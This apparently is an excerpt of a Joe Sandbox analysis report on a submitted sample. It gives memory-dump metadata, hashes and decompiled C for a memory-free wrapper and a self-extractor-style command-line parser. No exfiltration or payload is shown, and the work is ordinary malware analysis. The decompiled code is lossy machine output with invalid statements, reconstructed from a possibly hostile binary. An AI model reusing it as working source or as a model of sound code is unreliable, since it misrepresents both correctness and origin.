                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 008D4CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                            • Opcode ID: 17b9661ad3eba8a585422d97356277ea0d27280bb189d2cea288b07d19f79bf2
                                                                                                                                                                                                                                            • Instruction ID: 29afc490b341d4350334bc67ba10e2f844c7eaddbe0c51024ba0d8a7f602d34f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17b9661ad3eba8a585422d97356277ea0d27280bb189d2cea288b07d19f79bf2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81B0123204420CF7CF002FD2EC09F853F5DFBC4771F244001F60C45050CA7298108696
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D4CC0(void* _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x008d4cc8
                                                                                                                                                                                                                                            0x008d4ccf

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                            • Opcode ID: e951017057b39c0ad67608470eca7b84cf4d3f625ac16078052106c764a3a894
                                                                                                                                                                                                                                            • Instruction ID: b125142080fc1bcffc30a22746f6ae90be8d125b4c65812a00daca6fbe116c28
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e951017057b39c0ad67608470eca7b84cf4d3f625ac16078052106c764a3a894
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CB0123100010CF78F002B52EC088453F5DE6C42707100011F50C41021CB339C118585
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E008D5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				CHAR* _v265;
                                                                                                                                                                                                                                            				char _v266;
                                                                                                                                                                                                                                            				char _v267;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				CHAR* _v272;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				CHAR* _t69;
                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                            				signed int _t143;
                                                                                                                                                                                                                                            				CHAR* _t144;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                            				char _t155;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                            				char _t167;
                                                                                                                                                                                                                                            				char _t170;
                                                                                                                                                                                                                                            				CHAR* _t173;
                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                            				intOrPtr* _t183;
                                                                                                                                                                                                                                            				intOrPtr* _t192;
                                                                                                                                                                                                                                            				CHAR* _t199;
                                                                                                                                                                                                                                            				void* _t200;
                                                                                                                                                                                                                                            				CHAR* _t201;
                                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                            				int _t209;
                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                            				void* _t212;
                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                            				CHAR* _t218;
                                                                                                                                                                                                                                            				intOrPtr* _t219;
                                                                                                                                                                                                                                            				intOrPtr* _t220;
                                                                                                                                                                                                                                            				signed int _t221;
                                                                                                                                                                                                                                            				signed int _t223;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t173 = __ecx;
                                                                                                                                                                                                                                            				_t61 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                            				_t209 = 1;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                            					_t63 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					while(_t209 != 0) {
                                                                                                                                                                                                                                            						_t67 =  *_t173;
                                                                                                                                                                                                                                            						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                            							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v272 = _t173;
                                                                                                                                                                                                                                            						if(_t67 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t69 = _v272;
                                                                                                                                                                                                                                            							_t177 = 0;
                                                                                                                                                                                                                                            							_t213 = 0;
                                                                                                                                                                                                                                            							_t163 = 0;
                                                                                                                                                                                                                                            							_t202 = 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								if(_t213 != 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L21;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t69 =  *_t69;
                                                                                                                                                                                                                                            									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t69 = _v272;
                                                                                                                                                                                                                                            										L21:
                                                                                                                                                                                                                                            										_t155 =  *_t69;
                                                                                                                                                                                                                                            										if(_t155 != 0x22) {
                                                                                                                                                                                                                                            											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            												goto L106;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                            												_t177 = _t177 + 1;
                                                                                                                                                                                                                                            												_t202 = _t202 + 1;
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                            												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            													L106:
                                                                                                                                                                                                                                            													_t63 = 0;
                                                                                                                                                                                                                                            													L125:
                                                                                                                                                                                                                                            													_pop(_t210);
                                                                                                                                                                                                                                            													_pop(_t212);
                                                                                                                                                                                                                                            													_pop(_t162);
                                                                                                                                                                                                                                            													return E008D6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                            													_t177 = _t177 + 1;
                                                                                                                                                                                                                                            													_t202 = _t202 + 1;
                                                                                                                                                                                                                                            													_t157 = 2;
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												if(_t213 != 0) {
                                                                                                                                                                                                                                            													_t163 = 1;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t213 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L131;
                                                                                                                                                                                                                                            								L30:
                                                                                                                                                                                                                                            								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                            								_t69 = _v272;
                                                                                                                                                                                                                                            							} while ( *_t69 != 0);
                                                                                                                                                                                                                                            							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                            								E008D6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                            								asm("int3");
                                                                                                                                                                                                                                            								_push(_t221);
                                                                                                                                                                                                                                            								_t222 = _t223;
                                                                                                                                                                                                                                            								_t71 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                            								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                            									0x4f0 = 2;
                                                                                                                                                                                                                                            									_t75 = E008D597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E008D44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                            									 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            									_t75 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								return E008D6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                            								if(_t213 == 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										goto L34;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L40;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										_t79 = _v268;
                                                                                                                                                                                                                                            										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                            											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                            											if(_t83 == 0) {
                                                                                                                                                                                                                                            												_t202 = 0x521;
                                                                                                                                                                                                                                            												E008D44B9(0, 0x521, 0x8d1140, 0, 0x40, 0);
                                                                                                                                                                                                                                            												_t85 =  *0x8d8588; // 0x0
                                                                                                                                                                                                                                            												if(_t85 != 0) {
                                                                                                                                                                                                                                            													CloseHandle(_t85);
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												ExitProcess(0);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t87 = _t83 - 4;
                                                                                                                                                                                                                                            											if(_t87 == 0) {
                                                                                                                                                                                                                                            												if(_v266 != 0) {
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t50;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t88 =  *_t183;
                                                                                                                                                                                                                                            															_t183 = _t183 + 1;
                                                                                                                                                                                                                                            														} while (_t88 != 0);
                                                                                                                                                                                                                                            														if(_t183 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t205 = 0x5b;
                                                                                                                                                                                                                                            															if(E008D667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                            																L115:
                                                                                                                                                                                                                                            																_t206 = 0x5d;
                                                                                                                                                                                                                                            																if(E008D667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                            																	L117:
                                                                                                                                                                                                                                            																	_t202 =  &_v276;
                                                                                                                                                                                                                                            																	_v276 = _t167;
                                                                                                                                                                                                                                            																	if(E008D5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t202 = 0x104;
                                                                                                                                                                                                                                            																		E008D1680(0x8d8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t202 = 0x5b;
                                                                                                                                                                                                                                            																	if(E008D667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		goto L117;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t202 = 0x5d;
                                                                                                                                                                                                                                            																if(E008D667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L115;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *0x8d8a24 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L50;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t100 = _t87 - 1;
                                                                                                                                                                                                                                            												if(_t100 == 0) {
                                                                                                                                                                                                                                            													L98:
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t38;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t101 =  *_t192;
                                                                                                                                                                                                                                            															_t192 = _t192 + 1;
                                                                                                                                                                                                                                            														} while (_t101 != 0);
                                                                                                                                                                                                                                            														if(_t192 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t202 =  &_v276;
                                                                                                                                                                                                                                            															_v276 = _t170;
                                                                                                                                                                                                                                            															if(E008D5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                            																_t218 = 0x8d8b3e;
                                                                                                                                                                                                                                            																_t105 = _v276;
                                                                                                                                                                                                                                            																if(_t104 != 0x54) {
                                                                                                                                                                                                                                            																	_t218 = 0x8d8a3a;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																E008D1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                            																_t202 = 0x104;
                                                                                                                                                                                                                                            																E008D658A(_t218, 0x104, 0x8d1140);
                                                                                                                                                                                                                                            																if(E008D31E0(_t218) != 0) {
                                                                                                                                                                                                                                            																	goto L50;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L106;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                            													if(_t111 == 0) {
                                                                                                                                                                                                                                            														if(_v266 != 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t199 = _v265;
                                                                                                                                                                                                                                            																if(_t199 != 0) {
                                                                                                                                                                                                                                            																	_t219 =  &_v265;
                                                                                                                                                                                                                                            																	do {
                                                                                                                                                                                                                                            																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                            																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                            																		if(_t115 == 0) {
                                                                                                                                                                                                                                            																			 *0x8d8a2c = 1;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			_t200 = 2;
                                                                                                                                                                                                                                            																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                            																			if(_t119 == 0) {
                                                                                                                                                                                                                                            																				 *0x8d8a30 = 1;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                            																					 *0x8d8a34 = 1;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t209 = 0;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																		_t118 =  *_t219;
                                                                                                                                                                                                                                            																		_t199 = _t118;
                                                                                                                                                                                                                                            																	} while (_t118 != 0);
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															 *0x8d8a2c = 1;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L50;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t127 = _t111 - 3;
                                                                                                                                                                                                                                            														if(_t127 == 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                            																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                            																		goto L76;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                            																			goto L83;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                            																				goto L76;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				goto L49;
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																L76:
                                                                                                                                                                                                                                            																_push(2);
                                                                                                                                                                                                                                            																_pop(1);
                                                                                                                                                                                                                                            																L83:
                                                                                                                                                                                                                                            																 *0x8d8a38 = 1;
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            															goto L50;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t132 = _t127 - 1;
                                                                                                                                                                                                                                            															if(_t132 == 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0) {
                                                                                                                                                                                                                                            																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                            																			goto L49;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t201 = _v265;
                                                                                                                                                                                                                                            																		 *0x8d9a2c = 1;
                                                                                                                                                                                                                                            																		if(_t201 != 0) {
                                                                                                                                                                                                                                            																			_t220 =  &_v265;
                                                                                                                                                                                                                                            																			do {
                                                                                                                                                                                                                                            																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                            																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                            																				if(_t142 == 0) {
                                                                                                                                                                                                                                            																					_t143 = 2;
                                                                                                                                                                                                                                            																					 *0x8d9a2c =  *0x8d9a2c | _t143;
                                                                                                                                                                                                                                            																					goto L70;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                            																					if(_t145 == 0) {
                                                                                                                                                                                                                                            																						 *0x8d8d48 =  *0x8d8d48 | 0x00000040;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                            																						if(_t146 == 0) {
                                                                                                                                                                                                                                            																							 *0x8d9a2c =  *0x8d9a2c & 0xfffffffd;
                                                                                                                                                                                                                                            																							goto L70;
                                                                                                                                                                                                                                            																						} else {
                                                                                                                                                                                                                                            																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                            																							if(_t147 == 0) {
                                                                                                                                                                                                                                            																								 *0x8d9a2c =  *0x8d9a2c & 0xfffffffe;
                                                                                                                                                                                                                                            																								goto L70;
                                                                                                                                                                                                                                            																							} else {
                                                                                                                                                                                                                                            																								_t149 = _t147;
                                                                                                                                                                                                                                            																								if(_t149 == 0) {
                                                                                                                                                                                                                                            																									 *0x8d8d48 =  *0x8d8d48 | 0x00000080;
                                                                                                                                                                                                                                            																								} else {
                                                                                                                                                                                                                                            																									if(_t149 == 3) {
                                                                                                                                                                                                                                            																										 *0x8d9a2c =  *0x8d9a2c | 0x00000004;
                                                                                                                                                                                                                                            																										L70:
                                                                                                                                                                                                                                            																										 *0x8d8a28 = 1;
                                                                                                                                                                                                                                            																									} else {
                                                                                                                                                                                                                                            																										_t209 = 0;
                                                                                                                                                                                                                                            																									}
                                                                                                                                                                                                                                            																								}
                                                                                                                                                                                                                                            																							}
                                                                                                                                                                                                                                            																						}
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t144 =  *_t220;
                                                                                                                                                                                                                                            																				_t201 = _t144;
                                                                                                                                                                                                                                            																			} while (_t144 != 0);
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	 *0x8d9a2c = 3;
                                                                                                                                                                                                                                            																	 *0x8d8a28 = 1;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																goto L50;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																if(_t132 == 0) {
                                                                                                                                                                                                                                            																	goto L98;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	L49:
                                                                                                                                                                                                                                            																	_t209 = 0;
                                                                                                                                                                                                                                            																	L50:
                                                                                                                                                                                                                                            																	_t173 = _v272;
                                                                                                                                                                                                                                            																	if( *_t173 != 0) {
                                                                                                                                                                                                                                            																		goto L2;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		break;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L106;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										L34:
                                                                                                                                                                                                                                            										_t209 = 0;
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L131;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *0x8d8a2c != 0 &&  *0x8d8b3e == 0) {
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0x8d9a3c, 0x8d8b3e, 0x104) == 0) {
                                                                                                                                                                                                                                            							_t209 = 0;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t202 = 0x5c;
                                                                                                                                                                                                                                            							 *((char*)(E008D66C8(0x8d8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = _t209;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L131:
                                                                                                                                                                                                                                            			}


































































                                                                                                                                                                                                                                            0x008d5c9e
                                                                                                                                                                                                                                            0x008d5ca9
                                                                                                                                                                                                                                            0x008d5cb0
                                                                                                                                                                                                                                            0x008d5cb3
                                                                                                                                                                                                                                            0x008d5cb6
                                                                                                                                                                                                                                            0x008d5cb7
                                                                                                                                                                                                                                            0x008d5cb8
                                                                                                                                                                                                                                            0x008d5cbd
                                                                                                                                                                                                                                            0x008d6204
                                                                                                                                                                                                                                            0x008d5ccb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5ccb
                                                                                                                                                                                                                                            0x008d5cd3
                                                                                                                                                                                                                                            0x008d5cd7
                                                                                                                                                                                                                                            0x008d5cf4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5cf4
                                                                                                                                                                                                                                            0x008d5cf8
                                                                                                                                                                                                                                            0x008d5d00
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5d06
                                                                                                                                                                                                                                            0x008d5d06
                                                                                                                                                                                                                                            0x008d5d0e
                                                                                                                                                                                                                                            0x008d5d10
                                                                                                                                                                                                                                            0x008d5d12
                                                                                                                                                                                                                                            0x008d5d14
                                                                                                                                                                                                                                            0x008d5d15
                                                                                                                                                                                                                                            0x008d5d17
                                                                                                                                                                                                                                            0x008d5d49
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5d19
                                                                                                                                                                                                                                            0x008d5d19
                                                                                                                                                                                                                                            0x008d5d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5d3f
                                                                                                                                                                                                                                            0x008d5d3f
                                                                                                                                                                                                                                            0x008d5d4b
                                                                                                                                                                                                                                            0x008d5d4b
                                                                                                                                                                                                                                            0x008d5d4f
